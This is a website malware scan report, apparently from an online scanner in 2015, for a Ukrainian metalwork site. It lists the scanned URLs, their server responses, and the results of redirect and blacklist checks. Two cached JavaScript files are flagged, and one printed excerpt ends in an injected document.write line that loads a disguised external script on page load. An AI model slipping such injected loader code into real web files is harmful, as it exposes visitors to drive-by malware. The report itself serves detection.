Scanned pages/files
Request | Server response | Status |
http://www.steeland.com.ua/ | HTTP/1.1 302 Found Connection: close Date: Sun, 26 Apr 2015 03:23:56 GMT Location: http://www.steeland.com.ua/html/ Server: nginx admin Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/ | 200 OK Content-Length: 27188 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/cache/template/mootools-c1533987.js | 200 OK Content-Length: 74305 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';} if(typeof obj.le
Antivirus reports:
http://www.steeland.com.ua/html/cache/template/caption-be912474.js | 200 OK Content-Length: 1154 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var JCaption=new Class({initialize:function(selector) {this.selector=selector;var images=$$(selector);images.each(function(image){this.createCaption(image);},this);},createCaption:function(element) {var caption=document.createTextNode(element.title);var container=document.createElement("div");var text=document.createElement("p");var width=element.getAttribute("width");var align=element.getAttribute("align");if(!width){width=element.width;} if(!align) align=element.getStyle("float container.className=this.selector.replace('.','_');container.className=container.className+" "+align;container.setAttribute("style","float:"+align);container.style.width=width+"px";}});document.caption=null;window.addEvent('load',function(){var caption=new JCaption('img.caption') document.caption=caption}); ;document.write("<scr"+"ipt src='/html/language/en-GB/pentium.js'><"+"/script>");
Antivirus reports:
http://www.steeland.com.ua/html/cache/template/jquery-409821cc.js | 200 OK Content-Length: 93305 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html/cache/template/widgetkit-43152e90-ec97da9e.js | 200 OK Content-Length: 12960 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html/cache/template/template-5bc8d101.js | 200 OK Content-Length: 16186 Content-Type: application/x-javascript | clean |
http://code.jquery.com/jquery-latest.js | 200 OK Content-Length: 282766 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:23:59 GMT Location: http://www.steeland.com.ua/html/ Server: nginx admin Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione | 200 OK Content-Length: 19850 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/2011-12-20-13-53-22 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:00 GMT Location: http://www.steeland.com.ua/html/kovka/listia/ Server: nginx admin Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/listia/ | 200 OK Content-Length: 58901 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/piki | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:01 GMT Location: http://www.steeland.com.ua/html/kovka/piki Server: nginx admin Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/piki | 200 OK Content-Length: 31561 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/piatki | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:02 GMT Location: http://www.steeland.com.ua/html/kovka/piatki/ Server: nginx admin Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/piatki/ | 200 OK Content-Length: 23756 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/cvety | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:02 GMT Location: http://www.steeland.com.ua/html/kovka/cvety Server: nginx admin Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/cvety | 200 OK Content-Length: 33948 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/shary | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:03 GMT Location: http://www.steeland.com.ua/html/kovka/shary/ Server: nginx admin Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/shary/ | 200 OK Content-Length: 19230 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/sharypolye | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:04 GMT Location: http://www.steeland.com.ua/html/kovka/sharypolye Server: nginx admin Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/sharypolye | 200 OK Content-Length: 16827 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: steeland.com.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: steeland.com.ua
Referer: http://www.google.com/search?q=steeland.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=steeland.com.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://steeland.com.ua/
Result: steeland.com.ua is not infected or malware details are not published yet.